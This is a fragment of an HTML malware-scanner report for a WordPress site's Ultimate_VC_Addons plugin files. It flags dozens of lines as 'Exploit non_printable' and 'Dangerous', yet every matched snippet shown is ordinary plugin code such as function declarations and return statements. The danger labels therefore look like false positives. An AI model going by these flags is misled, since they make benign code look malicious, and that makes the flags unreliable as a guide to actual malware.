</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enquque_ultimate_google_fonts</span><span style="color: #007700">( </span><span style="color: #0000BB">$enqueue_fonts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 712</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$font_attributes </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 718</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$font_family</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 727</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_font_manager_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_font_style</span><span style="color: #007700">( </span><span style="color: #0000BB">$font_style </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$temp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'enquque_ultimate_google_fonts_optimzed' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enquque_ultimate_google_fonts_optimzed</span><span style="color: #007700">( </span><span style="color: #0000BB">$enqueue_fonts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_449").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_list_icon.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_450" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_List_Icon' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_list_icon </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_List_Icon</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Icon_List' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBake</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_VC_Addons_List_Icon</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Init</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">list_icon_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for list </span><span style="color: #0000BB">Icon</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_list_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 368</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 375</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_list_item_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_450").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_hotspot.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 37.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 19</span><br><table id="file_451" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'dev_mode' </span><span style="color: #007700">); if ( </span><span style="color: #DD0000">'enable' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">) { </span><span style="color: #0000BB">$js_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/js/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$css_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/css/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; } else { </span><span style="color: #0000BB">$js_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/min-js/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$css_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/min-css/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Hotspot Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Hotspot Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_items_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Hotspot module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 347</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Hotspot Param callback</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_hotspot_param_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Hotspot Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_admin_assets</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Hotspot Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 906</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 933</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_451").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_sticky_section.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_452" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_sticky_section_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_sticky_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'fixto'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_sticky_section_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'s</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Sticky Section Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Sticky Section module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sticky_shortcode_mapper</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Sticky Section Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 353</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
